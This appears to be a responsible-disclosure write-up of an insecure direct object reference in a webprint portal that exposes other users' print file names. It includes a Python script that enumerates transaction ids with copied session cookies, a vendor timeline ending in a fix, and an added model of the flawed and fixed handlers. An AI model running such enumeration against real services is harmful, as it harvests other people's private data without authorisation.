Webprint filename information disclosure

While browsing through a webprint environment I noticed it was possible to view old print transactions. When viewing an old print transaction, the date/time and filename are displayed.

This information is fetched by visiting a link that includes the transaction id:

https://<redacted>/Transaction/TransactionDetails?historyId=571564&terminalid=99

When providing a random transaction id, the print details of another user are displayed. Apparently the website fails to check if I’m the owner of the requested print job details. The only sensitive information displayed would be the file name, but there are situations where a file name is sensitive. A small Python script was created to request a bunch of filenames and look for sensitive names to strengthen the case:

import requests

# Log in to <>, navigate to My transactions and copy the cookie values below:
cookies = {
    "__RequestVerificationToken": "<value>",
    "ASP.NET_SessionId": "<value>",
    "FedAuth": "<value>",
    "FedAuth1": "<value>",
}

start_number = 25968550
while True:
    start_number += 1
    result = requests.post('https://<redacted>/Transaction/TransactionDetails?historyId=' + str(start_number) + '&terminalid=99', cookies=cookies)
    try:
        # The first entry of 'Data' holds the details of the requested transaction
        entry = result.json()['Data'][0]
        print("ID: " + str(start_number) + " | Time: " + entry['Time'] + " | Device: " + entry['DeviceName'] + " | Filename: " + entry['TrxDescription'])
    except (ValueError, KeyError, IndexError, TypeError):
        # No transaction for this id, or the response was not the expected JSON
        pass

Output:

Timeline:

  • 20 Aug 2020: Initial disclosure to vendor
  • 27 Aug 2020: Second attempt due to lack of response
  • 31 Aug 2020: Vendor acknowledges the problem
  • 20 Sept 2020: Fix has been deployed
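
The missing ownership check described above, modelled as an added example (this is not the vendor's code and not part of the original write-up). The handler names, the in-memory table and the sample records are assumptions constructed for illustration; only the field names Time, DeviceName and TrxDescription come from the response shown in the script.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Transaction:
    history_id: int
    owner: str             # account that submitted the print job
    time: str
    device_name: str
    trx_description: str   # the file name shown in the details view

# Constructed sample data standing in for the print-history table.
TRANSACTIONS = {t.history_id: t for t in (
    Transaction(1001, "alice", "2020-08-19 09:12", "Printer-A", "holiday-photos.pdf"),
    Transaction(1002, "bob", "2020-08-19 09:15", "Printer-B", "resignation-letter.docx"),
    Transaction(1003, "alice", "2020-08-19 10:02", "Printer-A", "invoice.pdf"),
)}

NOT_FOUND = (404, {"Data": []})

def _render(t):
    return 200, {"Data": [{"Time": t.time, "DeviceName": t.device_name,
                           "TrxDescription": t.trx_description}]}

def details_vulnerable(session_user, history_id):
    """Looks the record up by id alone, so any logged-in user can read any job."""
    t = TRANSACTIONS.get(history_id)
    return _render(t) if t else NOT_FOUND

def details_fixed(session_user, history_id):
    """Scopes the lookup to the session's user. A foreign id and a missing id
    get the same response, so the endpoint does not reveal which ids exist."""
    t = TRANSACTIONS.get(history_id)
    if t is None or t.owner != session_user:
        return NOT_FOUND
    return _render(t)

def visible_filenames(handler, session_user, ids):
    """File names one session can read across a range of ids (regression check)."""
    names = []
    for history_id in ids:
        status, body = handler(session_user, history_id)
        if status == 200:
            names.append(body["Data"][0]["TrxDescription"])
    return names

if __name__ == "__main__":
    for handler in (details_vulnerable, details_fixed):
        print(handler.__name__, visible_filenames(handler, "alice", range(1000, 1005)))
```

The same range walk that exposed other users' file names doubles as a regression test: against the fixed handler it must return only the caller's own jobs.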